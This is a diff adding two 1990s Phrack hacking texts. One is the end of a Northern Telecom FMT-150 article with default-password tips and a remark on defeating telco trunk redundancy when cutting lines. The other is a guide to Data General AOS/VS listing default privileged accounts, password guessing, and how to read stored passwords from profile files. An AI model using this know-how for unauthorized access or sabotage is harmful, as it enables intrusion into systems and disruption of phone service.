+Choose your terminal type, usually 2 (use VT100) if you are calling in,
+and it will prompt you with a "Login: " prompt, this is a trick, there
+are no user levels, the "Login:" simply means enter the password, and
+the default is to hit return, so always try that first.  If a password
+is installed then try something like FMT-150 or something that you would
+think they would use.  You should get a screen like this one after
+choosing the terminal type:
+
+
+                   FMT-150 Transmission System
+
+                         Northern Telecom
+
+
+
+
+
+               Firmware Copyright Northern Telecom 1988
+
+
+- - Node Id.:  123456789012345- - - - Last Update 87/03/06 11:07-
+Login:  (remember, enter a password here, no user levels!)
+
+- - Syst Id.:  123456789012345- - - - Time:  87/03/06  11:07- - -
+
+
+
+
+After Logging In
+
+(commands are presented in an outline configuration, you should
+be getting screens of output, but this outline will show you what
+to input.  # = number, not pound, <sp> = spacebar.)
+
+Example:  If I wanted to set the system's date to 1/4/1943 (heh)
+          then after logging in I would press, "c" then "d", then
+          "43", then "1" and finally "4".
+
+
+-----------------------------------------------------------------
+a                        Alarms (once again, lame stuff)
+     o                        Optical Tx/Rx unit-level alarm
+                                screen.
+     t                        Translator module-level alarm
+                                screen.
+     m                        DM-13 multiplexer-level alarm
+                                screen.
+     c                        Common equipment-level and customer
+                                input/output points alarm screen.
+
+c                        Configuration (!)
+     a                        alarm logger
+       e                        enable alarm logger
+       d                        disable alarm logger
+     i
+       # <sp>  "name"           Name a customer input point
+        o
+       # <sp>  "name"           Name a customer output point
+     d
+       #1 <sp> #2 <sp> #3 <sp>  Set date: #1 is year, #2 is month
+                                #3 is day.
+     t
+       #1 <sp> #2 <sp> #3 <sp>  Set time: #1 is hour, #2 is
+                                minute.
+     p
+       "oldpass"     "newpass"  Change password from "oldpass" to
+                                  "newpass".
+     s
+       "system ID name"         Name System ID
+
+s                        Switching commands (extremely extensive,
+                           so I will include a small portion)
+     # <sp>
+       m
+         # <sp>
+           <return>                 Display DM-13 Switch Screen
+       t
+         <return>                 Display translator/optics
+                                    switch status for node #.
+     <return>                 Display translator/optics switch
+                                status for local node or node last
+                                displayed.
+m                        Maintenance Commands
+     r (see note)
+       *                        Reset all nodes
+       # <sp>                   Reset node #
+     t
+       # <sp>
+         o                        Operate test of customer
+                                    input/output points and E2A
+                                    ports.
+         r                        Release test of customer
+                                    input/output points and E2A
+                                    ports.
+     l                            Logout of the FMT-150 system.
+
+n                        Network Status
+     <return>                 Display network status screen.
+
+
+NOTE: After executing a local or global MCU reset, the message
+"PROCESSOR CRASH" will appear on the bottom of the CRT's screen.
+As a result, the user will have to log back into the system.  In
+addition, a global MCU reset will clear all "names" and
+"settings" previously defined (that is, system ID, node, customer
+inputs/outputs, time and date).
+
+-----------------------------------------------------------------
+
+
+Many other commands are listed but they are extremely numerous
+and useless to the average phreak.
+
+If a "terminal" that is 4.4 inches tall with a center screen and
+2 12 key keypads on either side is seen on the shelf, this will
+be a CAMMS terminal, all functions above can be performed with
+this unit, its menu driven.
+
+
+Troubleshooting
+
+
+This section is the manual is devoted to fixing problems in the
+FMT-150, aimed at the average see-my-crack-of-the-ass telco
+maintenance man.
+
+Basically, if you see any red LEDs, inspect them and judge if you
+should get the hell out of the CO or not, usually red LEDs mean
+trouble.
+
+
+REDUNDANCY
+
+When doing anything of this nature to a fone company, you must
+remember, they are not stupid, everything has something to
+fall back on, if you were to cut a trunk line, there would be
+another to take its place.  Usually there will be only one
+backup, so be meticulous and find both.
+
+
+Outro
+
+
+Hope this file was worth something to somebody, it applies mostly
+to those in a GTE area, since GTE uses Northern Telecom equipment
+and most everyone else uses AT&T stuff.
+
+
+                                            -FyberLyte 9-93
diff --git a/phrack44/14.txt b/phrack44/14.txt
new file mode 100644
index 0000000..0cd49fa
--- /dev/null
+++ b/phrack44/14.txt
@@ -0,0 +1,1155 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 14 of 27
+
+()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
+
+                 A Guide to Data General Corporation's
+
+                             AOS/VS System
+                                 PART I
+
+                             by Herd Beast
+
+
+INTRODUCTION
+~~~~~~~~~~~
+
+This file is a full (as full as such a file can get) guide to the AOS/VS
+system.  The main reason for writing it is that from what I've seen,
+there is practically no info (in the form of files or otherwise) about
+it.  I won't say I'm the only one who knows anything about it, but I had
+a hell of a time getting any sort of help when I started hacking these
+systems (I didn't get that help, in case you were wondering, and wrote
+this file all by myself 'cause I'm a MAN!  Hahaha! <snort> <snort>).
+
+I will explain a little about AOS/VS and then explain some of the
+commands and security features in it.  This file is not a buffer of any
+help facility, although much information can and will be found in the
+help facility.
+
+I can be contacted (hopefully) at hbeast@mindvox.phantom.com.  If you
+want a nice start, and a front page on Newsweek, some Texaco ("Star of
+the American Road") systems run AOS/VS.
+
+I cannot, will not, and do not assume liability for ANY of the effects
+of the use of this file.  Also, I cannot guarantee that EVERYTHING will
+work EVERYWHERE, so treat this file as a reference.  This file by no
+means covers everything about AOS/VS.
+
+IDENTIFYING THE SYSTEM
+~~~~~~~~~~~~~~~~~~~~~
+
+Should you just fall at the system prompt, you might mistake it for a
+VMS.  However, blank prompts like that are rare.  An AOS/VS will
+identify itself like this: (this and all other buffered info in this
+file are from an AOS/VS II with CLI32.  Only the best for Phrack)
+
+AOS/VS II 2.20.00.12 / EXEC-32 2.20.00.07       31-May-93 22:51:25      @CON177
+
+Username:
+Password:
+
+Another thing different will be the incorrect login message:
+
+Invalid username - password pair
+
+The header line lists the system version, current time/date and the console
+you are using.
+
+When you reach the maximum incorrect logins defined in the system, it
+will show the line below and disconnect:
+
+Too many attempts, console locking for 10 seconds
+
+When you do succeed to log on, the system will display:
+
+------
+        Copyright (C) Data General Corporation, 1980 - 1992
+        All rights reserved.
+        Licensed material -- property of Data General Corporation
+        This software is made available solely pursuant to the
+        terms of a DGC license agreement which governs its use.
+
+((NOTE: Or something else.  This is the default))
+--------
+Most recent logon        1-Jan-93       10:10:01
+
+Very clear.  Before you do anything, type CHARACTERISTICS.  You will
+then get output like this:
+
+/605X/LPP=24/CPL=80/BREAK=BMOB/TCC=40000/TCD=5000/TDW=1000/THC=2000/TLT=2000
+/ON/ST/EB0/ULC/WRP/CTD
+/OFF/SFF/EPI/8BT/SPO/RAF/RAT/RAC/NAS/OTT/EOL/UCO/MRI/FF/EB1/PM/NRM/MOD/TO/TSP/
+C/FKT/VAL/HOFC/SHR/OFC/IFC/16B/ACC/SRDS/XLT/AUTOBAUD/CALLOUT/MDUA/HDPX/SMCD/RT
+D/HIFC/G1G0/DKHW/NLX
+
+Look for "/NAS".  It stands for non ANSI standard, which means that if
+you are using ANSI (probably you are), you needs to issue
+CHARACTERISTICS/OFF/NAS, should you find "/NAS" listed after "/ON".
+
+Upon logging off from the system (BYE), you will see:
+
+AOS/VS II  CLI   Terminating     1-JAN-93       11:11:01
+Process 180 Terminated
+Elapsed Time   0:16:26, CPU Time   0:00:02.447, I/O Blocks  281
+(Other console jobs, same USERNAME --  16)
+User 'HBT' logged off @CON228   1-Jan-93       11:11:01
+
+SYSTEM DEFAULTS
+~~~~~~~~~~~~~~
+
+These are accounts I usually found existing.  As usual, they are really
+similar to those of any other system.
+
+USERNAME
+--------
+((Privileged accounts))
+OP                                 EXEC default username
+SYSMGR                             System manager
+CEO_MGR                            If the system is running CEO
+OPER
+OPERATOR
+((Regular accounts))
+CEO.xxxxx                          If the system is running CEO, a CEO
+                                   user, xxxxx being his number.
+
+As for password guessing, well, it's all been said.  Try the username,
+with some modification, you might get in.  As dumb as it sounds, yes,
+people do have weak passwords, even today, although not everywhere.
+
+SYSTEM STRUCTURE
+~~~~~~~~~~~~~~~
+
+In this section I'll try to describe the real basics of AOS/VS.  I will
+describe a few commands HERE, and not under "Command List", these
+commands will be the basic commands: change directory, list files, etc,
+needed to survive in any system.
+
+The AOS "shell" is called CLI (Command Line Interpreter).  There are
+two versions of CLI, CLI16 and CLI32, with CLI32 being more advanced.
+The CLI version affects the system prompt, the way commands are handled
+by the system and by the user, and more.  For example, some command
+switches do not exist under CLI16 (unless very important, I omitted
+switches that work only under CLI32 from this file).
+
+Here are the privilege levels available under AOS/VS:
+
+          CLI16 PROMPT   CLI32 PROMPT  PRIVILEGES MODES
+          -------------+--------------+--------------------------
+          )              )             None
+                         Sm)           System Manager
+          +)             Sp)           Superprocess
+          *)             Su)           Superuser
+                         SmSp)         System Manager and Superprocess
+                         SmSu)         System Manager and Superuser
+          #)             SpSu)         Superprocess and Superuser
+                         SmSpSu)       System Manager, Superprocess, Superuser
+
+AOS/VS doesn't grant privileges upon logon.  A user's profile may state
+the user can access privilege level So-And-So, and if the user later
+needs that level, he calls upon a SUPER utility to grant him that
+level.  This is the place to explain how several different utilities
+work.  OPERATOR grants the user the ability to access diskettes in dump
+or load sessions (see the section titled "System Commands") in sequential
+order, instead of accessing them one by one.  SUPERUSER turns off all
+access checking, enabling the user to do anything with any file on the
+system.  SUPERPROCESS gives the user the ability to terminate, block,
+unblock, or change priorities of any process on the system.  The last
+command, PRIVILEGE, which is available only under CLI32, enables the user
+to set both SUPERUSER and SUPERPROCESS access.  It also offers the only
+way to set SYSTEMMANAGER access, which is required for operations like
+changing time or date.
+
+Command are executed by calling their names, or any part of their name
+that only fits them.  For example, SUPERUSER can be abbreviated as
+SUPERU.  It is important to remember that command switches MUST follow
+the command without any space, or else the command will try to process
+the switches!  For example, CHARACTERISTICS /OFF/NAS will result in an
+"Error: Illegal filename character characteristics,/off/nas".
+
+The root directory directory is called ':'.  Any other directories are
+under it, for example ':OUT' and ':OUT:RALF'.  If, for example, you FTP
+into an AOS/VS and use "cd /" you will be moved in ':'.  If you use "cd
+/out/ralf" you will be moved into ':OUT:RALF'.  To make this much more
+clearer (right):
+
+                                   :
+                                  HBT
+                                   |
+                                   |
+                                  TEXT
+                                  /  \
+                             PHRACK  SEX
+
+Legal characters in file or directory names are all the alphabet and
+numbers, plus '$', '_', '.' and '?'.
+
+Moving from directory to directory is done by using the "DIRECTORY"
+command.  Without any arguments, DIRECTORY shows the current path.  With
+an argument, DIRECTORY changes to that directory.
+
+DIRECTORY [directory]
+---------------------
+
+/I        Changes to the initial directory
+/I path   Changes the initial directory to "path"
+/P        Changes to the previous directory
+
+To list files in a directory, use "FILESTATUS".  Without arguments,
+FILESTATUS lists files in the current directory.  With a path argument,
+FILESTATUS lists file in that path.
+
+FILESTATUS [directory]
+----------------------
+
+/[AFTER|BEFORE]/[TCR|TLA|TLM]=date and/or time
+
+          Shows files matching the selection date or time.  The
+          selections are: time created (TCR); time last accessed (TLA);
+          and time last modified (TLM).  The difference between accessed
+          and modified is pretty clear, for example if the file is an
+          executable.  The date/time format is: for TIME - hour-minute-sec
+          (xx-xx-xx); for DATE - day-month-year (xx-xxx-xx); for BOTH -
+          dd-mmm-yy:hh:mm:ss.  Example command lines will be
+
+          FILESTATUS/AFTER/TCR=11             Created after 11 AM
+          FILESTATUS/BEFORE/TLM=01-JAN-90     Modified before 01/01 1990
+          FILESTATUS/AFTER/TLA=01-JAN-90:11   Accessed after 11 AM,
+                                              01/01, 1990
+
+/ASSORTMENT
+
+          Normally, FILESTATUS output is just file name.  With
+          /ASSORTMENT, FILESTATUS shows file type, time/date of
+          creation, and length in bytes.  Similar to Unix, if the file
+          is a link, the file type is set to LNK and FILESTATUS shows
+          its path.
+
+/COUNT    Tells how many files are in the directory.   [CLI32]
+
+/[DCR|DLA|DLM]
+
+          Shows date of creation (DCR); date last accessed (DLA); and
+          date last modified (DLM).
+
+/LENGTH   Displays file length in bytes.
+
+/LINKNAME
+
+          If the file is a link, FILESTATUS displays the information
+          about the file that it's linked too.  For example, if BOB is
+          linked to RON, FILESTATUS/LINKNAME BOB would display RON's
+          details.  Otherwise, nothing happens.
+
+/TYPE=[\]type
+
+          Displays files of type, or all files not of that type (if
+          \type) was used.  See below for valid file types.
+
+/UDA      If the file has a UDA (user data area), its presence is displayed.
+
+The CLI's wildcards (sort of), are '=', '^', ':' and '@.  '=' means the
+current directory.  '^' means the parent directory.  ':' is (as already
+said) the root directory.  '@' means the devices directory (where
+consoles, tape drives, modems, etc are.  Similar to /dev on Unix).  Note
+that when talking about directories, the ':' is already included.  For
+example, if you're in :UDD:HBT:TEXT, and want to move to :UDD:HBT:BIN,
+you'd type DIRECTORY ^BIN, and not DIRECTORY ^:BIN.  File wildcards are
+'+', which is equivalent to '*' at DOS, and '#' which is equivalent to
+'*.*' at DOS.  For example, FILE +.CLI will show all the files whose
+names end with ".CLI"; FILE :UDD:# will display all the files in UDD
+(which won't happen if you just issue FILE :UDD -- in that case, you'll
+see only information about the directory UDD, and not the files within
+it).
+
+As with Unix, you can enter more than one command on a line if you
+separate the commands with a ';' (a semicolon).  If you need more than a
+line for your commands, type an '&' before pressing Return, and the CLI
+will just keep on reading, instead of processing the command line and
+try to run it.  This goes ONLY for a sequence like this: "&<Return>", an
+'&' anywhere else acts just like any other character.
+
+There are several control characters the CLI takes and uses:
+
+                 CONTROL CHAR               WHAT IT DOES
+                 ------------------+-------------------------------
+                 Ctrl-C              Begins a Ctrl char sequence.
+
+                 Ctrl-D              End of file.
+
+                 Ctrl-L              Clear screen.
+
+                 Ctrl-P              Don't interpret the following
+                                     character in any special way.
+
+                 Ctrl-S              Stops output to the terminal.
+
+                 Ctrl-Q              Resumes output to the terminal.
+
+                 Ctrl-U              Cancel (delete) current input line.
+
+                 Ctrl-C Ctrl-A       Interrupt current process.
+
+                 Ctrl-C Ctrl-B       Terminates current process.
+
+                 Ctrl-C Ctrl-C       Empties the input buffer.
+
+                 Ctrl-C Ctrl-E       Terminates current process and
+                                     create a break file (where
+                                     termination message is stored).
+
+If the CLI is run with a /NOCA switch, it will ignore Ctrl-C Ctrl-A
+sequences, so if put in the start of a macro file, it won't allow you to
+break that macro and enter the CLI.
+
+AOS/VS had many file types.  File types are three letter acronyms
+(although not always) for the file; the same way DOS and VMS have
+extensions, the file type controls what the file is (it can have any
+extension in its name).  File types have a decimal numbers assigned to
+them, as well.  There are 70 file types, although the operating
+system reserves space for 128.  The user can define his own file types.
+These are some of the he AOS/VS file types:
+
+                     TYPE NUMBER     TYPECODE       MEANING
+                    -------------+------------+-----------------
+All these types  /      11        LDU        Logical disk unit
+are directories -|      12        CPD        Control point directory
+                 \      10        DIR        Directory
+                         0        LNK        Link
+                        68        TXT        Text
+                         1        SDF        System data file
+                         2        MTF        Magnetic tape file
+                        13        MTV        Magnetic tape volume
+                        22        MTU        Magnetic tape unit
+                        49        CON        Console
+                        51        RMA        Remote host (RMA)
+                        52        HST        Remote host (X.25 SVC)
+                        54        PVC        Remote host (X.25 PVC)
+                        64        UDF        User data file
+                        69        LOG        System log file
+                        74        PRV        AOS/VS program file
+                        75        WRD        Word processing file
+                        87        UNX        Unix file (created on a Unix)
+                        95        SPD        Spreadsheet file
+                       104        PIP        Pipe
+                       105        TTX        Teletex file
+
+
+"Generic files" are actually pointers that help using devices and files.
+For example, the @NULL generic file functions like /dev/null on Unix.
+Here are the generic files:
+
+     @CONSOLE       The process' (user's) console.
+
+     @DATA          A long file created by the user that will be used as
+                    data by a program.  @DATA is set using DATAFILE.
+
+     @INPUT         A short file created by the user that will be used
+                    as input by a program.  @INPUT is set using
+                    PROCESS/INPUT=.
+
+     @NULL          Well, null.
+
+     @LIST          A long output file that will be used as a program's
+                    output.  @LIST is set using LISTFILE.
+
+     @OUTPUT        A short output file for a program.  @OUTPUT is set
+                    using PROCESS/OUTPUT=.
+
+When a program is run, it will sometime try to open one of these generic
+files.  If they're not set, it will fail on error 21 (non existent
+file).  But if the file is set, it can use it.  So, for example, you can
+use PROCESS/OUTPUT=@CONSOLE PROGRAM for output to go to you, or
+PROCESS/OUTPUT=OUT_FILE PROGRAM for it to go to OUT_FILE.
+
+"Device files" are files the connect to hardware parts, such as modems,
+printers, tapes, diskette drives, FAX machines, etc.  In due time, a
+program called EXEC makes a connection between processes and devices and
+utilizes those devices (see the section titled "The 'EXEC' Program").
+Some devices are also used by the backup related programs DUMP and LOAD,
+and more.  Some of these are:
+
+     @MTB0:x        The magnetic tape unit #0, x being a dumpfile on the
+                    tape (x starts from 0).
+
+     @DPJ           A diskette device name.
+
+     @LFD           A generic labeled diskette file name.
+
+
+The equivalent of a PATH (usually environment variable) in other systems
+is called SEARCHLIST in AOS/VS.  When you call a command, or ask for
+help, the CLI looks through your SEARCHLIST for the files.  So, assuming
+you typed HELP MODEM, and somewhere in your searchlist there exists a
+file called MODEM.CLI, HELP will show you,
+modem           - Macro, File :UTIL:COMM:MODEM.CLI
+The same goes for other commands, even TYPE (TYPE MODEM.CLI from
+:UDD:HBT, if :UTIL:COMM is in your searchlist and there's no MODEM.CLI
+in :UDD:HBT will work).
+
+To display your searchlist, just use plain SEARCHLIST.  To change it,
+use SEARCHLIST path,path,path ...
+
+It's possible to set a password for your current CLI session.  This
+password is not the password used upon login!  It's a password the user
+sets to protect his session.  He then types LOCK, and from then, anyone
+wishing to use the user's CLI (from the user's console), must enter the
+password first.  Legal passwords are up to 32 characters long, not
+including Ctrl characters.
+
+The CLI offers several levels to the user.  It starts on the highest
+level, 0, and the user may create other level, and use POP to move up a
+level, and PUSH to go down a level.  When a user POPs to a level,
+the CLI environment of the older (higher) level remains (the environment
+of the level he was in until that time is therefore changed).  When he
+PUSHes, the current level's environment is copied to the lower level.
+To display the current CLI level, use LEVEL.  To display the level's
+environment, use CURRENT.  To display an upper level's environment
+(except when at the highest level), use PREVIOUS.
+
+When you want to print a file, or run something in the background, you
+have to submit it as a job.  The submit a printing job, use the QPRINT
+command (will print the file).  To submit a batch job, which is for
+executing a command, use QBATCH (for example, QBATCH MASM ASMPROG).
+
+AOS/VS had a facility called "queues", managed by the EXEC program (see
+"The 'EXEC' Program").  A queue is a place where file transfer, batch,
+and printing jobs are stored until the right process can take them and
+execute them.  The standard queues are:
+
+          QUEUE NAME       JOB TYPE                 CONTENTS
+          --------------+------------+----------------------------------
+          BATCH_INPUT        Batch       Batch input files.
+                                         Submitted by QBATCH or QSUBMIT.
+
+          BATCH_OUTPUT       Printing    Output files from finished
+                                         batch jobs (usually sent to a
+                                         line printer).
+
+          BATCH_LIST         Printing    List files from finished batch
+                                         jobs (usually sent to a line
+                                         printer).
+
+              ((Batch jobs are submitted through QBATCH.))
+
+          LPT                Printing    Print jobs submitted by QSUBMIT.
+
+          MOUNTQ             Mount       Tape mount requests.
+                                         Submitted by MOUNT.
+
+After a job has been submitted, use QDISPLAY to show its status.  Use
+QHOLD to hold jobs and QUNHOLD to release them.  Last, to display the
+status of all queues, use QDISPLAY as well.
+
+AOS/VS also has an extensive help facility.  For help on broad topics,
+use HELP (to list topics) and then HELP *TOPIC.  For help on system
+commands, use HELP COMMAND (for a list of switches) or HELP/V COMMAND for
+more details.
+
+CLI MACRO PROGRAMMING
+~~~~~~~~~~~~~~~~~~~~
+
+Macro filenames usually end with ".CLI" are usually text files (filetype
+TXT).  A macro is a file that will be executed when called (adding .CLI
+to the name when calling isn't necessary), and perform the commands (or
+other macros) in it.  If the macro matches the name of a CLI command,
+the macro must be called together with the .CLI part of its name.  Macros
+expand arguments in the following way:
+
+Range Arguments (like filenames):
+
+%x%       Argument number x, with its switches.  %0% is the macro's
+          name.
+%-%       All the arguments, with their switches, except for %0%.
+%x-y,i%   Arguments x through y, in jumps of i.  If x or i are missing,
+          the CLI assumes 1.  If y is omitted, 32767 is assumed.  For
+          example, if the arguments were "1 2 3 4 5 6 7", a %2-6,2% call
+          expands to "2 4 6".
+
+Switch Arguments:
+
+%x/%      All the switches of argument x.
+%x\%      Argument x, without its switches.
+%x/y%     Argument x, with switch number y.
+%x/y=%    The value of argument's x switch number y.
+%x\y%     All the switches of argument x, including their values, except
+          for switch number y.
+
+Conditionals are used in the form of [CONDITIONAL,ARGS].  If a
+conditional returns TRUE, the CLI executes everything after it until it
+reaches an ELSE or an END.  Otherwise, it skips to an ELSE or an END
+(basic programming).
+
+!EQUAL    True if both arguments equal alphabetically.
+!NEQUAL   True if both arguments don't equal alphabetically.
+!UEQ      True if both arguments equal numerically.
+
+These are called pseudo macros, and are usually built like conditionals,
+although sometimes they just substitute for a part of the environment.
+There are about 60 of them, but I'll only list a selected few for
+brevity.
+
+[!ACL path]         Expands for the ACL of path.
+[!ASCII octnum]     Expands to the ASCII character with the octnum octal
+                    number.  For example, newline is octal 12.
+[!CLI]              Expands to CLI32 or CLI16, according to the CLI.
+[!DATE]             Date, like 01-Jan-93.
+[!SYSTEM]           Expands to the type of OS.
+[!SEARCHLIST]       Expands to the search list.
+[!LEVEL]            Expands to the current CLI level.
+[!CLI]              Expands to the CLI type.
+[!EXPLODE args]     Puts a comma between each pair of character in args.
+                    When used with STRING, in converts spaces and tabs
+                    too.  When used with WRITE, in converts into space.
+[!LISTFILE]         Expands to the path of the listfile.
+[!USERNAME]         Expands to the username of the person running the
+                    macro.
+[!LOGON]            Returns CONSOLE if logged on to a terminal or BATCH
+                    if logged in on a batch stream (only works for EXEC
+                    logons).
+[!DATAFILE]         Expands to the path of the datafile.
+[!HID [host]]       Returns the host ID.  With [host] return the host ID
+                    of [host].
+[!HOST [host]]      Returns the host name.
+[!STRING]           Expands to the value of the CLI string.
+
+A more complex pseudo macro is !READ:
+[!READ[/args] text]
+
+!READ prints text to the output and then expands to what was received
+from the input (which is considered finished when a newline is
+received).  !READ's args are functional only under CLI32 and are:
+
+/EOF=str
+
+          The string that will be returned if EOF is met.
+
+/FILEID=file
+
+          Reads from file instead of @OUTPUT.  The file must be already
+          opened using OPEN.
+
+/LENGTH=x
+
+          Read until x characters were typed.
+
+/S
+
+          Discards all typed after a semicolon (';') or a left bracket
+          ('[').  Otherwise, that text must be a valid CLI command or
+          macro, or a pseudo macro or macro ending with a right bracket
+          if following the left bracket.
+
+Note that all pseudo macros, including !READ can be used at the command
+line and not just in CLI macro files.
+
+
+Here's an example:
+
+COMMENT -------------------------------------------------
+COMMENT Examples of the use of conditionals and arguments
+COMMENT in macros.
+COMMENT This macro was invoked like this:
+COMMENT HMAC 9 0 000
+COMMENT -------------------------------------------------
+
+[!EQUAL,%1%,]
+     WRITE,,,,Execute with arguments please!
+[!ELSE]
+     [!EQUAL,%2%,%3%]
+          WRITE,,,,%2% and %3% do match ALPHABETICALLY.
+     [!ELSE]
+          WRITE,,,,%2% and %3% don't match ALPHABETICALLY.
+     [!END]
+     [!UEQ,%2%,%3]
+          WRITE,,,,%2% and %3% do match NUMERICALLY.
+     [!ELSE]
+          WRITE,,,,%2% and %3% don't match ALPHABETICALLY.
+     [!END]
+     [!UEQ,%1%,%2%]
+          WRITE,,,,%1% and %2% do match NUMERICALLY.
+     [!ELSE]
+          WRITE,,,,%1% and %2% don't match NUMERICALLY.
+     [!END]
+[!END]
+
+COMMENT -------------------------------------------------
+COMMENT The output would be:
+COMMENT 0 and 000 don't match ALPHABETICALLY.
+COMMENT 0 and 000 do match NUMERICALLY.
+COMMENT 9 and 0 don't math NUMERICALLY.
+COMMENT -------------------------------------------------
+
+[!EQUAL,[!READ What's your name?,,],HBT]
+     WRITE,,,,[!ASCII 12]You're HBT.
+[!ELSE]
+     WRITE,,,,[!ASCII 12]You're not HBT.
+[!END]
+
+[!EQUAL,[!CLI],CLI16]
+     WRITE,,,,[!ASCII 12]I was going to show you something else.
+     WRITE,,,,Too bad you're using CLI16 which won't let READ take arguments.
+[!ELSE]
+     STRING [!READ/LENGTH=1 Continue? (Y/N)]
+     [!EQUAL,[!STRING],N]
+          WRITE,,,,[!ASCII 12]Good man [!USERNAME].
+     [!ELSE]
+          [!EQUAL,[!STRING],Y]
+               WRITE,,,,[!ASCII 12]Too bad Mister I-Use-[!SYSTEM]
+          [!ELSE]
+               WRITE,,,,[!ASCII 12]Learn English guy.
+          [!END]
+     [!END]
+[!END]
+WRITE,,,,Thank you for using %0%.
+
+AOS/VS can also be programmed in 16 bit and 32 bit Assembly (and
+compiled using MASM), BASIC, Fortran, C, Pascal and probably others.
+
+This second program is actually quite simple.  I do not even read the
+UPF type file directly; I just feed text into the PREDITOR (see the next
+section).
+
+COMMENT -------------------------------------------------
+COMMENT Delete the little help screen if you are under
+COMMENT CLI16.  Or just run CLI32.
+COMMENT -------------------------------------------------
+
+[!EQUAL,%1%,]
+     WRITE,,,,[!ASCII 12]Format is: %0%/A NAME
+     WRITE,,,,,,,,,,,,or      /L NAME
+[!ELSE]
+     [!EQUAL,%1%,]
+               WRITE,,,,,,,Which user exactly?
+     [!ELSE]
+          [!NEQUAL,%0/L%,]
+               WRITE/L=?USER.TMP  L
+               WRITE/L=?USER.TMP  %1%
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP  b
+               PROC/DEF/IOC/IN=?USER.TMP/BLOCK PREDITOR
+               DEL ?USER.TMP
+          [!ELSE]
+               WRITE/L=?USER.TMP  c
+               WRITE/L=?USER.TMP  %1%
+               WRITE/L=?USER.TMP  y
+               WRITE/L=?USER.TMP  %1%
+               WRITE/L=?USER.TMP  n
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP
+               WRITE/L=?USER.TMP  b
+               PROC/DEF/IOC/IN=?USER.TMP/BLOCK PREDITOR
+               DEL ?USER.TMP
+          [!END]
+     [!END]
+[!END]
+
+SYSTEM SECURITY
+~~~~~~~~~~~~~~
+
+The AOS/VS login is performed in the following manner.
+
+Every username has a file associated with it in the :UPD directory.
+That file is its profile, and contains the account profile.  Once the
+user has entered a correct username/password pair, the operating system
+loads the user's profile (which includes how much memory and disk space
+the user is allowed to use and the user's allowed privileges) into its
+internal tables.  Several privileges which can be set are the initial
+user directory and initial program that will be executed upon completion
+of the login (eg, the CLI); how many processes the user may run; what
+process priorities the user has; and what SUPER privileges the user has
+(eg, SUPERUSER, SUPERPROCESS).
+
+As mentioned, if the user has SUPER privileges, he must activate them
+himself (using the right command, or PRIVILEGE if using CLI32).
+
+An important thing to know about password security is that if the system
+is running Data General's XODIAC networking software, user's might not
+be able to access remote machines through the network if the passwords
+are encrypted.  Therefore, if you are on a XODIAC host, chances are the
+passwords won't be encrypted.  The ACL of the :UPD directory doesn't let
+every user can access it, though.
+
+Passwords are changed by the user by pressing Ctrl-L immediately after
+entering the password at login.  This will only work for users that have
+the privilege to set their own passwords.  Legal passwords are 6 to 15
+characters.
+
+This the format (the fields) of the AOS/VS profiles:
+
+* Password
+* Initial program          To be executed after login
+* Initial IPC file         The LOGON file
+* Initial directory
+* Default user priority    The user's process priority
+* Maximum queue priority   The highest queue priority which the user can
+                           set for a batch job.  The lower the number, the
+                           higher the priority (1-255).
+* Unlimited son processes
+* Maximum son processes    If the above option if off.
+* Disk quota in blocks
+* Logical address space    Allows the user to control the size of the
+(batch)                    logical address space in which his programs
+                           will be executed.  If -1, the system sets.
+* Minimum working set      The minimum number of pages a user can have in
+(batch)                    their active processes.  If -1, the system
+                           determines the value according to the program's
+                           demands.
+* Maximum working set
+(batch)
+* Logical address space
+(non batch)
+* Minimum working set
+(non batch)
+* Maximum working set
+(non batch)
+* Encrypt password
+* Superuser
+* Superprocess
+* Use IPC                  Allows the user to make IPC calls.
+* Use console
+* Use batch
+* Use virtual console      Virtual consoles are created by networked
+                           logins.
+* Use modem                A modem is a console with the characteristic of
+                           /MOD on.
+* Change password
+* Change priority
+* Change type
+* Change username          Allows user to become another username without
+                           actually logging in into that user's profile.
+* Access devices           Allows user to directly issue Assembly
+                           instructions to devices.
+* Create without block     Allows the user to start a son process without
+                           blocking the father process.
+* System manager privileges
+* Access local devices remotely
+* Change addr. space type  Allows 32 bit processes to be called from 16
+                           bit processes (usually on, since there is a
+                           CLI16, but most programs are 32 bit).
+* Change working set limit Allows user to change the working set size of
+                           programs.
+* Comments
+
+User profiles can be created, deleted, read, and modified from the
+AOS/VS User Profile Editor: PREDITOR.  PREDITOR gives you a prompt
+from which you can read any account and the values of its fields.
+PREDITOR does not, however, display the password field, whether it's
+encrypted or not -- just an indication of what the Encrypt Password
+field is set to.  This is easily overcome, since if you can execute the
+PREDITOR, you can just as well SED the :UPD:USERNAME file and look at
+the password (it's right up there) -- PREDITOR can only be loaded by a
+user that can become Superuser.
+
+Legal commands for the PREDITOR are Create, Delete, Edit, List,
+Question, Rename, and Use.  They can all be abbreviated to their first
+letter.  When CREATE is called, it first asks if you want to set the
+password, and depending on the answer asks you to enter a password.  It
+then queries about the other fields, giving you three options (usually):
+YES, NO, and NL, the system's default.  DELETE just asks for a
+confirmation on deleting the user, and also his home directory.  EDIT is
+just like CREATE, allowing you to modify any field in the user's profile
+(including the password).  LIST lists the status of every field in the
+profile (by using a template profile, such as '+', one could view every
+user on the system).  QUESTION sets the system defaults, which will later
+be used by CREATE and EDIT.  RENAME allows you to rename a user to another
